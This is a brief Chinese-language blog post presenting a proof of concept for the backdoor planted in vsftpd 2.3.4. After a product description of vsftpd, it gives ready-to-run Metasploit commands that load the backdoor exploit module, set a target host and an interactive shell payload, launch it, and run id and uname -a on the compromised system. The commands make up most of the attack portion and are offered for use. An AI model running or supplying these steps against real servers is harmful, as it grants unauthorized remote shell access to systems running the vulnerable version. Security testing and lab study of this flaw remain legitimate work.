Vsftpd 2.3.4后门poc

发布:wpulog | 发布时间: 2011年7月6日

vsftpd在安全性、高性能及稳定性三个方面有上佳的表现。vsftpd提供的主要功能包括虚拟IP设置、虚拟用户、Standalone、inetd操作模式、强大的单用户设置能力及带宽限流等。在安全方面，vsftpd从原理上修补了大多数Wu-FTP、ProFTP，乃至BSD-FTP的安装缺陷，使用安全编码技术解决了缓冲溢出问题，并能有效避免“globbing”类型的拒绝服务攻击。目前正在使用vsftpd的官方网站有Red Hat、SuSE、Debian、GNU、GNOME、KDE、Gimp和OpenBSD等。vsftpd 2.3.4版本被人植入了后门代码。metasploit目前已经发布了exploit代码，使用发放如下：
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST localhost
set PAYLOAD cmd/unix/interact
exploit
id
uname -a

出自：BugZone - http://www.pulog.org/poc/2121/Vsftpd-2.3.4-poc/ 转载必须注明！